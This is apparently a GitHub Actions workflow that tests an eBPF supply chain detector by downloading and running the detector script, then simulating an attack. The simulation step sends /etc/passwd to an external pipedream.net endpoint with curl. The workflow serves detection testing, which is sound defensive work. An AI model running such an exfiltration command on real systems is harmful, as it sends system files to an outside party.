name: Run eBPF Supply Chain Detector (Python)

on:
  push:
    branches: [main]

jobs:
  run-ebpf:
    runs-on: self-hosted

    steps:
      - name: Install BCC dependencies
        run: |
          sudo apt update
          sudo apt install -y bpfcc-tools linux-headers-$(uname -r) python3-pip
          pip3 install bcc

      - name: Download supplychain-detect.py
        run: |
          curl -L https://raw.githubusercontent.com/rohitcoder/rootconf-25-supplychain/main/supplychain-detect.py -o supplychain-detect.py
          chmod +x supplychain-detect.py

      - name: Run eBPF supply chain detector in background
        run: |
          nohup python3 supplychain-detect.py > detect.log 2>&1 &
          echo $! > detector.pid

      - name: Wait for eBPF to attach
        run: sleep 5

      - name: Simulate supply chain exfiltration from host
        run: |
          curl https://903e71dc0c872212a00b1d19477faafe.m.pipedream.net \
            --data-binary "@/etc/passwd"

      - name: Wait for detector to log event
        run: sleep 5

      - name: Show detector logs
        run: cat detect.log

      - name: Cleanup background process
        run: |
          kill -9 $(cat detector.pid) || true
          rm -f detector.pid detect.log
